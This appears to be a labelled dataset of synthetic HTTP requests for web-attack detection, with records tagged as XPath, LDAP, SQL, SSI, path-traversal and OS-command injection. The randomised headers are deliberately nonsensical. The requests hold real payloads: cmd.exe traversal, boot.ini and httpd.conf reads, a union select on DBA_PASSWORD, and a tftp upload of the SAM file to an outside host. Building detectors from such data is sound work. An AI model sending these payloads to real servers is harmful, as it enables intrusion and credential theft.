Referer: /tnessltc/el3rcht/tdqqnhns/ozxssd.txt
TE: trailers
Trailer: Referer
User-Agent: Mozilla/4.7 (Machintosh; U; Mac OS X 6.0; iE-dp; rv:0.6.8) Gecko/36206650
UA-CPU: MIPS
UA-Disp: 5432,6298,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3418x3633
Via: HTTP/9.3 www.ugthb.js, FTP/3.1 190.32.191.7
Transfer-Encoding: compress
Upgrade: Nnfs/7.4
Warning: 938 248.40.128.148 "sur0lis0nzeta4oe" "Sun, 25 Apr 04 08:25:21 UTC"
X-Forwarded-For: 70.253.19.118
X-Serial-Number: 61054598804485092045
----: -------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 40539
Start - Id: 49890
class: XPathInjection
GET /osneao73eeta10lip/enI2Y-EFRM-7h_ZfKnJm/ano6ickledorhd/na9Gctin/oci1oseeoiTA/chttpsmUkCRSiR8N/nE-pCR_d/tZaEl3n1TuOtHU/u9abielzagdte8eYmu/vbscriptC.bin?keaoebNdnvn6no6=%40fue%2Btaccept%24utcuts4&rsbunt=3nc3C&GxcMWm3FB=dne%3BO+%5Dunao&u6=npaew%27+or+++%28i++++%3C++++count%28lh0ior%2Fchild%3A%3Atext%28%29%29++and++j+%3C+count%28wB%2Fchild%3A%3Acomment%28%29%29++and+++++k++++%3C+count%28IXm%2Fchild%3A%3A*%29+%29++or+++%27y5%27+++%3D+++%27+++6sEtNeA1%27+or&saD=wmwme%7Eiua&o4eTtbu3=3795654&opacpheuegh=Hds&8eaKfst0QU=70098915&QWh.SVoo.QuQ=h7i&nrsrhntsnkr=tx-Uwx3Wm&ootxan=nxlcpsNtnmifa&aithd=65342&ASpwindow.openPILZgP=75 HTTP/1.1
Host: 171.73.234.14:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tcdfiaoh-edenwqdb;q=0.3, p-3ljeiten, o-oohh, ehfst80i-ud3turnf, ua-relaOdes
Cache-Control: min-fresh=65
Client-ip: 222.216.7.189
Cookie: x1bmauUisIFY=HiaYi3uEis;wRWB=17;lt=nculhS;lIzekroshoviln=ntsgxmlNeid>p2
Cookie2: $Version="614"
Date: Mon, 11 Jul 05 09:12:00 CET
ETag: W/"79-wqobJXvLTgCDO1"
Expect: 3ms1era
From: ldlcym@E8Sinechia.ch
If-Modified-Since: Wed, 04 Mar 09 04:33:06 CET
If-Unmodified-Since: Sun, 08 Mar 09 04:38:33 CET
If-Match: "WotaI_7NSmjhHGH"
If-None-Match: "AlcXNctY-E.3B4V_iDLw"
If-Range: "wprpgx.JTyvvy.E"
Max-Forwards: 064
MIME-Version: 6.4
Pragma: hetuH='8erunlvr'
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: Digest realm
Range: -997,889715-,62803-
Referer: /grIhtap/9oidnt/aEhntalD/thrn.asmx
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/5.1 (compatible; MSIE 6.9; Mac OS X; peidoab)
UA-CPU: StrongARM
UA-Disp: 2831,824,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9591x1965
Via: 7.6 www.Adssrrw.js, 2.6 34.199.106.40
Transfer-Encoding: identity
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 883 www.oeedEt.gif "90sw81n3tnalV" 
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49890
Start - Id: 39782
class: SSI
GET /snT@CrNLqzR@vv/--qbY2dOfnl/aSoagnion7e/imgngunionusrmgJGXHj-/MnodeUdHU1g6IzMor.aspx?nAy3t87nyradird=oevalna%5D%27utttld&vUgdivCY=%3Em&sYxrnv=rfo%28perlmtowsl8nt&@wzg9eX530E=arnsna2aoehuaolab&fbD_=6594928&tSlieian9=%3C%21--++%23include+virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++++--%3E&eooseighi=wl&dekraot0ON=mb%3Csmt0a&reqo4=t%5Ce%3Etln%7CoAm69 HTTP/1.0
Host: 42.172.44.64
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-roman;q=0.0, euc-kr;q=0.6, iso-8859-8-i, x-mac-korean;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=93
Client-ip: 67.130.92.57
Date: Fri, 27 Jul 07 04:28:37 GMT
ETag: "QCg0rnofLs5BigHdeAp_"
If-Match: "4CaXjZk6l8HOJzq"
Max-Forwards: 6
MIME-Version: 6.0
Pragma: hdewe7='p'
Authorization: Basic M3p1czBmZTpjaW5lYXJkcw==
Range: 153-666
Referer: http://www.ashp.uk/t3einc.mp3
Trailer: Via
User-Agent: Mozilla/7.1 (compatible; MSIE 5.0; Mac OS X; SnR2b; itdsar; tjess33sol)
UA-Pixels: 181x202
X-Serial-Number: 39977076241136
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39782
Start - Id: 44604
class: OsCommanding
GET /Alnla/oaxbhtRlhaeiolTstasw/tts4aoin/3z_P7WN4yWYLizQ/lqotqoiiassloi6et.jpeg?rtokn=193.179.51.15+%7C+++++tftp+-i++117.91.253.188+PUT+sam._&nietesyo=2 HTTP/1.1
Host: 102.12.104.165
Connection: close
Accept: audio/*, audio/x-wav, text/html
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=0
Client-ip: 234.131.254.239
Cookie: DOUfE1v=oitce;keYMntnrtraf=LJtkoadminIindo;ZVn@K5_0.=se
Cookie2: $Version="67"
Date: Mon, 29 Oct 07 22:06:21 GMT
ETag: "YiQ@0NMwQ2OIQMTOOMbh"
Expect: gwsl=lee0l;ngaecoee
From: 8sf9@dbeln5gatO.gov
If-Modified-Since: Thu, 20 Nov 08 03:56:32 GMT
If-Unmodified-Since: Thu, 05 Oct 06 12:29:28 UTC
If-Match: "gBM_dAGU6ieKTuaJLGaJ"
If-None-Match: *
If-Range: Thu, 04 Nov 04 13:10:44 CET
Max-Forwards: 0
MIME-Version: 1.7
Pragma: 1ctau='0u'
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Ntiork yesrssnr=smegluuc
Range: 41676-
Referer: /ahmit/dqednoi/nh8fo/ie8ts14d.css
TE: deflate;q=0.9
Trailer: Trailer
User-Agent: jH.5FevC http://www.ntehlt.cz
UA-Disp: 0488,6492,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 494x0584
Via: FTP/6.5 www.udafkw.gif, 6.3 78.153.60.110:18124, xay/6.5 www.7rsfucnp.css
Transfer-Encoding: gzip
Upgrade: sraa/8.7, apdat/7.5, Eir8/9.0
Warning: 294 www.eeugeo2c.png "bVo5d8oDShGrt1n" 
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 44604
Start - Id: 44460
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 203.95.199.178:80
Connection: 5m4boa
Accept: text/*;q=0.3, image/jpeg, application/*
Accept-Charset: utf-8;q=0.2, isiri-3342
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 1.111.16.222
Cookie: saaNuo=4\e;tesboblORmpsldo=92887;tpie=thAl;tTrsmnyal=diae5bttEitmP~;Iesoeae2ngfalth=r7
Cookie2: $Version="827"
Date: Tue, 05 Jan 10 22:00:07 GMT
ETag: "ThoS9sljlpyhPMguDr"
Expect: 100-continue
From: bniw@mamjmaT.net
If-Modified-Since: Wed, 19 Aug 09 21:49:32 UTC
If-Unmodified-Since: Fri, 18 Jul 08 15:32:15 CET
If-Match: ".7wk_ABn1mKSYzp"
If-None-Match: *
If-Range: Sat, 17 May 08 09:59:05 UTC
Max-Forwards: 50
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic TzJicGU6ZXVndHJa
Authorization: Digest nonce
Range: 6-02287,72753-
Referer: /uroDt/dutij/oeo2/Rkrlnts/ebtu.gif
TE: gzip
Trailer: Accept-Language
User-Agent: om1MfXUw.M http://www.ei4o.ch
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: HTTP/4.0 187.115.150.91, 7.7 www.gft9E.css
Transfer-Encoding: compress
Upgrade: n7n4g/9.8, isEasp/0.6, dOHut/7.0, ywG/7.6, sesne/6.3
Warning: 437 173.103.168.4:0949 "sd9tmoa" "Tue, 17 Aug 04 10:18:28 UTC"
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44460
Start - Id: 36593
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.a9s3eehi3.st
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: min-fresh=17
Client-ip: 88.241.103.90
Cookie: eemAtqc=sJCn@5;R25r1Dboot.ini=caoftwa=arE1xei;weyawille=072383832;tou7snoGlyxma=6go;biframelinkga;baaauterra9e=fIClNmF4R;Dmwu9passwdk@1=t0ett
Cookie2: $Version="52"
Date: Tue, 28 Dec 04 18:30:13 UTC
ETag: W/"2ugy4E-E4UwJTbxpi1"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Sun, 10 Apr 05 15:21:35 UTC
If-Unmodified-Since: Thu, 22 Nov 07 20:11:33 GMT
If-Match: "dE6XbxLs5Rag4RPx"
If-None-Match: "94kSwCR_xV_@Zxye"
If-Range: Tue, 28 Feb 06 08:57:46 CET
Max-Forwards: 365
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: NTLM czRtdGlldHNTck5sbHRzZ3VlaWF0dHM2SWNlYThpcGw=
Authorization: Basic dHZyb2VpOmk0aEVpNA==
Range: -5
Referer: http://2snnsiul.it/rewkoot/diaDi/efaeEet/tmihBt/r0eig.gif
TE: chunked
Trailer: Referer
User-Agent: eidAEmewpoaigadif
UA-CPU: MIPS
UA-Disp: 750,0599,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 7.0 www.echssscn.htm, 7.7 www.Tero.tiff
Transfer-Encoding: identity
Upgrade: ldezE/3.1, ieuhio/3.5, vasgc/3.8, trl4e/6.5
Warning: 611 www.lnn5olje.js "lioehd4dehdsc3y" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 85538465859468
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36593
Start - Id: 38275
class: LdapInjection
GET /i_uhUyo/a5F/gBKF8xDuThMEXwAy/ootnyhdeow/CSLNojCL2758/XNshutdownadminjtaGobject/tlT0K74kpdRpTX/h7ldehtd.tiff?s9tSe3tyiDmiA=ett&etdneeOs8rl3=sQ2ypLaem4DG&M2=group+by+aeeor%3D%2Fee9bhttpslldj%2F&hnrWsstoen=58%29%28%26%28objectClass%3Dpseo%29%28%7C%28sn++%3D+m6%29%28cn%3Der+++J*%29%29&za=77+s&talbuc=rfzKkb&hqmp7rn5raeo=nHtsmrepstdines HTTP/1.1
Host: 75.231.6.4:2
Connection: sr93nc
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: RQ9y4nY-bietTjos;q=0.0
Cache-Control: only-if-cached
Client-ip: 227.248.33.223
Cookie: h8n=38
Cookie2: $Version="30"
Date: Thu, 06 Mar 08 23:01:39 CET
ETag: "YAtQRZ8M5wKeOH1a4o"
Expect: 100-continue
From: iaon@um9ltetugp.biz
If-Modified-Since: Fri, 18 May 07 18:16:33 GMT
If-Unmodified-Since: Sat, 28 Oct 06 11:51:31 UTC
If-Match: "XdH2l0gCAt6oyvun6"
If-None-Match: *
If-Range: Tue, 16 Nov 04 18:44:11 GMT
Max-Forwards: 2
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest username="mscm"
Authorization: Basic U3NrYWdlZTY6b2Q3eA==
Range: 2323-,18-
Referer: http://kShsEeo.org/xeuUcnla/ezof/yeiin4c/earooee/eFeamtth.aspx
TE: deflate,chunked;q=0.7,deflate
Trailer: Proxy-Authorization
User-Agent: Anoee8y8e (aAHM37; n3u7yoUf; eAFskAg22Z; stOsag3)
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4041x0261
Via: HTTP/2.2 www.ue71f30o.css
Transfer-Encoding: gzip
Upgrade: o4f/8.5, ihuE/9.9
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 165.116.155.114
X-Serial-Number: 70527822
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 38275
Start - Id: 36608
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.1
Host: www.bqsanaFI7.st
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: lfo-0tsaruw, sttnr-y
Cache-Control: max-stale=703
Client-ip: 34.3.142.249
Cookie: iaBoetld=g:r/t;senbh=60176188;e2nle=hsde6 ] @n@6h0d?m8l
Cookie2: $Version="9"
Date: Thu, 22 Mar 07 24:53:46 CET
ETag: "EQO6XZqhgp6eucuyMd-9"
Expect: 100-continue
From: CmaD@nstapeung.st
If-Modified-Since: Thu, 29 Sep 05 18:53:19 UTC
If-Unmodified-Since: Mon, 08 Feb 10 10:00:09 CET
If-Match: "mh5ikNHeLZjWLte"
If-None-Match: "y3-OKVTeDdF14ozbiQ9"
If-Range: Tue, 04 Apr 06 01:21:17 GMT
Max-Forwards: 93
MIME-Version: 1.9
Pragma: eytR=9
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: NTLM dHNzNWtjNDMxaWVsZXNpdG9sY3NueGxjc3NpZHJ1dHJ0OWE5b3Q=
Range: 017729-
Referer: /eedh.conf
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/6.8 (compatible; rsuh9Or; Linux i386; dAfI)
UA-CPU: MIPS
UA-Disp: 1925,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 8.0 44.192.193.9, FTP/2.8 www.wdi17E.png
Transfer-Encoding: compress
Upgrade: hr8so/4.0, h23/1.4, yud3rE/6.4, xdnou/0.4, bIe4Er/8.9
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 2.248.231.30
X-Serial-Number: 0686987
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36608
Start - Id: 44147
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.0
Host: 14.77.232.17:2439
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: ks_c_5601-1987, iso-8859-8-i;q=0.7, shift_jis;q=0.0, x-mac-chinesesimp;q=0.6, iso-8859-4
Accept-Encoding: *;q=0.1
Accept-Language: hncOe-ecdBi, n-wi4eMxN;q=0.1, q3t-e;q=0.7, Saroc-eo
Cache-Control: max-stale=9579
Client-ip: 39.47.60.88
Cookie: yaJouAiyuekie=addaa;lIOnsr=11155185;iolplrbsyfnnhe=29785256
Cookie2: $Version="16"
Date: Fri, 19 Dec 08 21:19:34 CET
ETag: W/"j11dUi1m7aDRxn7yYAcp"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Sat, 11 Aug 07 08:00:30 UTC
If-Unmodified-Since: Fri, 30 Apr 04 18:50:21 GMT
If-Match: "D.@porpLCF@3E-TB4"
If-None-Match: *
If-Range: "DX5982-v6mPIKEx"
Max-Forwards: 0031
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: tMqhEe tIsc=uo9tsxe
Authorization: Digest algorithm=MD5
Range: 815-,644-20793
Referer: http://njdsata.be/uAbsalbn.jsp
TE: trailers,trailers
Trailer: Date
User-Agent: ohtnpkyay/2.0.7.2
UA-CPU: PowerPC
UA-Disp: 010,645,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5788x525
Via: 3.3 74.6.233.37, FTP/4.3 205.130.142.7, tn3/0.6 www.re0pe.jpeg
Transfer-Encoding: ha1tyt
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 461 www.cMmiov.shtml "nih5iohnfhs8ylysduaa" "Thu, 12 Feb 09 12:33:00 CET"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44147
Start - Id: 44196
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.lp8atrji.be
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ecoh-tAda;q=0.8, xehLeoe-erbpltae, l-eeeacws;q=0.6, cutlo-a, rrz541-idl;q=0.2
Cache-Control: no-cache
Client-ip: 130.86.46.202
Cookie: o2mo=formF;xjpemaasxmovo=14399360;webspedsg=421973
Cookie2: $Version="1"
Date: Wed, 26 Nov 08 12:54:48 UTC
ETag: "BRW_@ARVUq6pOiuJ"
Expect: yoeh
From: rOaz@gEadsxsee.biz
If-Modified-Since: Mon, 13 Apr 09 06:25:35 UTC
If-Unmodified-Since: Fri, 30 Apr 10 14:14:25 GMT
If-Match: "51GGEvrUjWv6RfhQUW"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 8.7
Pragma: tt=tpaiftrd
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: Digest nonce
Range: 22399-
Referer: http://www.jr9i.be/rsatl/y4aiek7.rar
TE: trailers,deflate,trailers
Trailer: Referer
User-Agent: oG-9tOT http://www.hosr.ch
UA-CPU: PowerPC
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 953x6132
Via: FTP/3.3 34.131.158.29:9022
Transfer-Encoding: deflate
Upgrade: mrn/4.8, niDaor/3.7, h2u/1.0
Warning: 700 www.yhebtw99.tiff "Igi9im" 
X-Forwarded-For: 81.148.120.241
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44196
Start - Id: 49534
class: XPathInjection
GET /I40sx/JuRPwXdF@Zwindow.openF1l/ena@a2fnkCK_.mdb?6fro=wutNE2eWanEW&owAnechprsmn=sbau&Dem=802143&NrGssnwe=nRmriQHBAJ3&eiutE=adminpt&umun=08756&_SoAEF.=9caseLngt&g0Hhoneamta=70756&nar=610213&uofgdSn1HnUec=3&ZBrFFDBaq9r=b%40bkEr1J.8_&ns7palcsnrbAi=exsr%2Ft72s92%2Fd%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D1%5D+or+%27ianh%27%3D+%27 HTTP/1.0
Host: 129.113.188.88
Connection: close
Accept: */*
Accept-Charset: iso-8859-1;q=0.3, shift_jis, x-mac-hebrew;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: min-fresh=92565
Client-ip: 91.134.19.242
Cookie: onc2oof=ises/tRn8iott
Cookie2: $Version="18"
Date: Fri, 05 Mar 04 16:15:18 GMT
ETag: W/"KtLgebekwR@UKJq0g"
Expect: ttats=eJshr
From: n6so@lthuy7i.ch
If-Modified-Since: Tue, 18 Jul 06 16:11:59 UTC
If-Unmodified-Since: Tue, 28 Aug 07 01:09:05 GMT
If-Match: *
If-None-Match: "kAxwiNt-5bsypFbqyV"
If-Range: Tue, 19 Jan 10 01:27:44 UTC
Max-Forwards: 2
MIME-Version: 4.9
Pragma: uoeh='dtpc'
Proxy-Authorization: ae9cy3 mcawsh6=6imqoMWi
Authorization: Basic czhsZXU6ZDdlM2Fs
Range: -57965,183531-,88063-39
Referer: /t6nRgi/lTalrnb.mdb
TE: chunked;q=0.8,trailers,deflate;q=0.1
Trailer: Connection
User-Agent: tivhaat
UA-CPU: x86
UA-Disp: 2924,8513,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 661x844
Via: 6.6 www.tsvro.tiff, trge/5.7 7.179.24.67, 2.3 16.89.67.36
Transfer-Encoding: identity
Upgrade: 7o6mn6/1.4, twjeP/1.1, eevzn/6.2
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 1653383151363869
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49534
Start - Id: 37625
class: LdapInjection
POST /bkbqVpGiQ1sFuloN./e0eptTyasg4dGe/iwiYSkCTkOXF5VqyO47.gif? HTTP/1.0
Content-Length: 136
Content-Language: zt,tn,cfmrr
Content-Encoding: compress
Content-Location: /TxjhxnA/wmwusie/UtR5Wnu/tknee.conf
Content-MD5: YTl1aDJqNGhjb2l1dm1ocA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 28 Mar 08 02:02:00 CET
Last-Modified: Wed, 15 Dec 04 22:41:38 UTC
Host: 50.37.87.74
Connection: nezjyBef
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: gzip, gzip;q=0.7, gzip, compress
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 236.109.120.226
Cookie: im0d8isphn=602658394;7i7tLihfkbci=gq0rier;eeisrAOi77z3a=eti;5fqk9egloukhnmb=e9evoo2&h;etRaela9t2phmt=45
Cookie2: $Version="0"
Date: Tue, 01 May 07 02:00:27 CET
ETag: "qM-H1LLpOM.992utv5JA"
Expect: 100-continue
From: eVgdo@tlh3.net
If-Modified-Since: Tue, 03 Jun 08 11:09:45 UTC
If-Unmodified-Since: Wed, 26 May 04 13:49:22 CET
If-Match: *
If-None-Match: "5FSjhDuT7b2BQUdJ"
If-Range: Sat, 22 May 04 11:16:44 GMT
Max-Forwards: 048
MIME-Version: 4.3
Pragma: 8cosdae8='ixul'
Proxy-Authorization: Digest username="pitaah"
Authorization: Basic QWFvZzptUmFwZGk=
Range: -6153,297-,439-473
Referer: http://nor3.be/ides.cgi
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: seioaza/2.5.2.1
UA-CPU: MIPS
UA-Disp: 2548,1743,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4356x362
Via: tl3too/3.6 106.230.232.152:85087, 2.3 www.2cieDnuE.htm, or54/8.0 www.AR6wvni.js
Transfer-Encoding: deflate
Upgrade: h2wcb/8.8, cimsk/8.6, t7ta/0.2, stciO/0.4
Warning: 904 www.kohoocU.html "niuhm" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BbxHCb=ex666B.T8&ot=4655)(&(objectClass=eaoe)(|(sn    =  s7)(cn=pst  J*))&e7mnhpsieo4zuN=i&akrv=2707126396

End - Id: 37625
Start - Id: 45456
class: PathTransversal
GET /e7SLeu/rHdAfa/jYnph-c9chtvmZ./oF8X3mcegnir6uhieg/uq5OqergF7xUIJ0.png?csteienkea=t%3A%5Cwinnt%5Cboot.ini HTTP/1.1
Host: www.nyarene.ch
Connection: NCcn
Accept: text/*, image/jpeg, text/plain;q=0.3
Accept-Charset: x-mac-roman, euc-jp;q=0.2, ks_c_5601-1987;q=0.2, windows-1253, x-mac-hebrew
Accept-Encoding: 
Accept-Language: hi-trpnBe
Cache-Control: max-age=5
Client-ip: 140.149.19.126
Cookie: ieont=elaqntnHtmnb;ujwenciacns=etjia8eehrT0Ltn;fYqAmetaPJb3n9s=o2s;srniTamIexdx=nbb6j;lgfmtektiD=rS3qg;uN=0h
Cookie2: $Version="857"
Date: Fri, 17 Oct 08 05:44:36 GMT
ETag: "KhhxyjAs64YdLIzO"
Expect: 100-continue
From: wXuowl@fhcnteilt.be
If-Modified-Since: Thu, 31 Jul 08 06:23:31 GMT
If-Unmodified-Since: Fri, 01 Sep 06 21:38:03 UTC
If-Match: *
If-None-Match: "iYiinQsTzQeL28NRQ"
If-Range: Mon, 23 Nov 09 01:06:43 UTC
Max-Forwards: 234
Pragma: Fx='wbl'
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: tesiN rlr8tzl=ur3Tiso
Range: -884,93-882862,81022-507
Referer: /uria.css
TE: trailers,trailers
Trailer: Host
User-Agent: tt5o8sAo/4.1
UA-Disp: 5444,1005,8
UA-OS: Win9x
UA-Color: color8
Via: 4.8 www.ocwfdia7.jpg:7894, olkan/6.1 171.27.90.190
Transfer-Encoding: compress
Upgrade: a5a/5.3
Warning: 895 95.106.146.142 "tark01bhtisa" 
X-Forwarded-For: 176.191.17.103
X-Serial-Number: 347804024892974921
----: -----------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45456
Start - Id: 35300
class: SqlInjection
GET /ej/fDsDcLMx/uwBp_htShJ3FN9/eddeer103mli.php4?rcer5=e+u&sam78@F53vchildk=ia+&8likeWxRGSxSMP=76790&AtdE1soNbntD8=9075&ewa=%27union+++select+++PASSWORD+from++++DBA_PASSWORD%3B--&aRaeTrgi=558&s1ca2gno=tQJ26&ntda=Ebt5Wndxh&atoDie=73612&np4mkperlf7F=IonrprvtstFl4i0&eucisawosr=iwNzoS%5Dnma&nqpAInxoptKo=oGRsD2jd6cJ&Cazbrsyadt=6705&etbnl=4448744&LkiTLo-l=oaw6e9%3Daehyis+Ntmp HTTP/1.1
Host: 133.248.149.34
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 213.3.132.26
Cookie: neortmC=tlli\=-NtQzeq&iAeunionk;B3t6nwsaaaeE3tu=hYwqxDK;ez0nq=kdsr
Cookie2: $Version="04"
Date: Mon, 06 Mar 06 24:24:22 CET
ETag: "-DIqNN_AVJHh1rNgpl"
Expect: 100-continue
From: bohfsrn3@6agvleeeda.com
If-Modified-Since: Mon, 07 Apr 08 14:36:06 GMT
If-Unmodified-Since: Thu, 30 Oct 08 09:01:15 UTC
If-Match: "@Rz5jkyRfCO5NwkJ0P"
If-None-Match: "nKhvYL@HW57.tz6."
If-Range: "9Me-gDD9gfiCN5PioDce"
Max-Forwards: 2358
MIME-Version: 2.4
Pragma: sBftho='Hl'
Proxy-Authorization: Digest opaque="wwob"
Authorization: cXoqh tssae=ttshhkh
Range: -6,470-,89626-1
Referer: /tesalrET/ttSonal.php
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/8.2 (X11; U; Linux i386 8.2; el-ia; rv:8.1.9) Gecko/60486344
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 048x605
Via: 7c4/0.5 www.l4jo36ex.gif:1, aypN/6.3 www.ehtaaloz.html, HTTP/6.6 www.soeo.shtml
Transfer-Encoding: nnppi; oeei=un9esas
Upgrade: dn44o/1.3
Warning: 196 www.nlePzsap.css:26 "ocnorS3ta4heNl" "Tue, 12 Jul 05 07:48:44 CET"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 75933173899999851
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 35300
Start - Id: 48741
class: XPathInjection
GET /oa3sOeutobR/td8litfQ6tsinaa/1j_OirMf8cI3.shtml?nPIy=a%2FI2lt%2FRihoce%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D61%5D+++++or+%27aenfe%27+%3D++++%27&mswmtoiOe9r=069675333&3adiudotsyrfal=8r2ltrihe29a8vle&1aesyucac=8947065&tmwhzhnnls=eihuulyZ&oahC=eLd&il=9392885479&.metajIMh=aDXX3O&ceuux35ua=%29c0a3Omuedspa%24e%3Fgsa&sn=4480679 HTTP/1.1
Host: www.SrT3oO9.fr:03219
Connection: gutpeseo
Accept: text/html, audio/*;q=0.8, image/png;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 7.35.45.248
Cookie: ni4s=582157;tehT6eHmcanaMo=6\;rcgekDMmK2-0=tho> ;d0owe=44322;pnash3gc=powewseGh1iltesrpn;dqztLmhtjirhc=nidg8 eaee4tomo
Cookie2: $Version="20"
Date: Thu, 08 Jun 06 23:20:23 GMT
ETag: W/"PspXBVtFw6MVjqF-1t"
Expect: fonrex
From: lYglyt2@7smfrhi.org
If-Modified-Since: Wed, 24 Nov 04 11:13:40 GMT
If-Unmodified-Since: Wed, 14 Nov 07 17:19:03 CET
If-Match: "uT-ue5yiX1eUubDT."
If-None-Match: *
If-Range: Wed, 03 Mar 10 21:40:47 UTC
Max-Forwards: 790
MIME-Version: 9.4
Pragma: orR='tItvsia9'
Proxy-Authorization: Basic MXRmVGVkYTplaGVzdHpoaA==
Authorization: ipell hd9inJu4=onthee52
Range: 328-,-79624
Referer: /ooar/o1Eqned7/esrsn.asmx
TE: deflate,gzip;q=0.2
Trailer: Upgrade
User-Agent: s_jJN3M9 http://www.eetep.st
UA-CPU: Sparc
UA-Disp: 383,7036,16
UA-OS: Windows 98
UA-Pixels: 9907x836
Via: ekt/4.2 76.250.150.25, 6.2 227.235.252.211, celnf/2.0 163.145.61.193:410
Transfer-Encoding: gzip
Upgrade: dHRher/7.4, eng/4.5
